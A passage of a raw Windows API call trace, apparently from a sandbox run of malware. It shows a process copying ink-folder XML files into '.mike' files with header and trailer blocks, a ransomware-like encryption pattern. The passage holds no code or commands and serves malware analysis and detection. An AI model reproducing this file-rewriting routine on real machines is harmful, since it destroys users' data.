SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.809] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.809] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.810] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.810] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", lpFilePart=0x0) returned 0x42 [0043.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.810] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.810] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", lpFilePart=0x0) returned 0x42 [0043.810] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.810] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.810] GetFileType (hFile=0x264) returned 0x1 [0043.810] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.810] GetFileType (hFile=0x264) returned 0x1 [0043.810] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.810] WriteFile (in: hFile=0x264, lpBuffer=0x21ae79c*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21ae79c*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.811] CloseHandle (hObject=0x264) returned 1 [0043.811] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.812] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), fInfoLevelId=0x0, lpFileInformation=0x21ae2e0 | out: lpFileInformation=0x21ae2e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9de)) returned 1 [0043.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.812] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.812] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.812] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.812] GetFileType (hFile=0x264) returned 0x1 [0043.812] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.812] GetFileType (hFile=0x264) returned 0x1 [0043.812] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.812] ReadFile (in: hFile=0x264, lpBuffer=0x21af8b0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21af8b0*, lpNumberOfBytesRead=0x2af0c8*=0x9de, lpOverlapped=0x0) returned 1 [0043.814] CloseHandle (hObject=0x264) returned 1 [0043.814] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", lpFilePart=0x0) returned 0x42 [0043.814] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.814] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.814] GetFileType (hFile=0x264) returned 0x1 [0043.814] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.814] GetFileType (hFile=0x264) returned 0x1 [0043.814] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.814] WriteFile (in: hFile=0x264, lpBuffer=0x21b626c*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21b626c*, lpNumberOfBytesWritten=0x2af0bc*=0x9e0, lpOverlapped=0x0) returned 1 [0043.815] CloseHandle (hObject=0x264) returned 1 [0043.815] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", lpFilePart=0x0) returned 0x42 [0043.815] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.815] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.816] GetFileType (hFile=0x264) returned 0x1 [0043.816] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.816] GetFileType (hFile=0x264) returned 0x1 [0043.817] WriteFile (in: hFile=0x264, lpBuffer=0x21b9480*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x21b9480*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.817] CloseHandle (hObject=0x264) returned 1 [0043.817] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", lpFilePart=0x0) returned 0x42 [0043.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.818] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe451b500, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe451b500, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe451b500, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc00)) returned 1 [0043.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", lpFilePart=0x0) returned 0x42 [0043.818] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.818] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x21bab30 | out: lpFileInformation=0x21bab30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe451b500, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe451b500, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe451b500, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc00)) returned 1 [0043.818] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.818] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.818] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", dwFileAttributes=0x80) returned 0 [0043.819] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.819] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", lpFilePart=0x0) returned 0x42 [0043.819] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.819] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe451b500, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe451b500, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe451b500, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc00)) returned 1 [0043.819] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.820] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpFilePart=0x0) returned 0x3d [0043.820] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike", lpFilePart=0x0) returned 0x42 [0043.820] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.mike")) returned 1 [0043.821] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpFilePart=0x0) returned 0x3d [0043.821] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpFilePart=0x0) returned 0x3d [0043.821] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpFilePart=0x0) returned 0x3d [0043.821] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.821] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.822] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.822] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpFilePart=0x0) returned 0x3d [0043.822] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.822] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.822] GetFileType (hFile=0x264) returned 0x1 [0043.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.823] GetFileType (hFile=0x264) returned 0x1 [0043.823] CloseHandle (hObject=0x264) returned 1 [0043.823] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpFilePart=0x0) returned 0x3d [0043.823] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpFilePart=0x0) returned 0x3d [0043.823] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.823] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.823] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.823] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), fInfoLevelId=0x0, lpFileInformation=0x21bca90 | out: lpFileInformation=0x21bca90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d08442, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d08442, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9188b373, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9da)) returned 1 [0043.823] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpFilePart=0x0) returned 0x3d [0043.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.824] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), fInfoLevelId=0x0, lpFileInformation=0x21bcd80 | out: lpFileInformation=0x21bcd80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d08442, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d08442, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9188b373, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9da)) returned 1 [0043.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpFilePart=0x0) returned 0x3d [0043.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike", lpFilePart=0x0) returned 0x42 [0043.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.824] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.824] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpFilePart=0x0) returned 0x3d [0043.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpFilePart=0x0) returned 0x3d [0043.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpFilePart=0x0) returned 0x3d [0043.824] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike", lpFilePart=0x0) returned 0x42 [0043.824] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0043.824] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0043.825] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike", lpFilePart=0x0) returned 0x42 [0043.825] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.825] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.825] GetFileType (hFile=0x264) returned 0x1 [0043.825] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.825] GetFileType (hFile=0x264) returned 0x1 [0043.825] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.825] WriteFile (in: hFile=0x264, lpBuffer=0x21bdad4*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x21bdad4*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.826] CloseHandle (hObject=0x264) returned 1 [0043.826] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0e8) returned 1 [0043.826] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), fInfoLevelId=0x0, lpFileInformation=0x21bd618 | out: lpFileInformation=0x21bd618*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d08442, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d08442, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9188b373, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9da)) returned 1 [0043.826] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0e4) returned 1 [0043.827] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpFilePart=0x0) returned 0x3d [0043.827] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af02c) returned 1 [0043.827] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.827] GetFileType (hFile=0x264) returned 0x1 [0043.827] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af028) returned 1 [0043.827] GetFileType (hFile=0x264) returned 0x1 [0043.827] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.827] ReadFile (in: hFile=0x264, lpBuffer=0x21bebe8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21bebe8*, lpNumberOfBytesRead=0x2af0c8*=0x9da, lpOverlapped=0x0) returned 1 [0043.828] CloseHandle (hObject=0x264) returned 1 [0043.829] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.mike", lpFilePart=0x0) returned 0x42 [0043.829] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 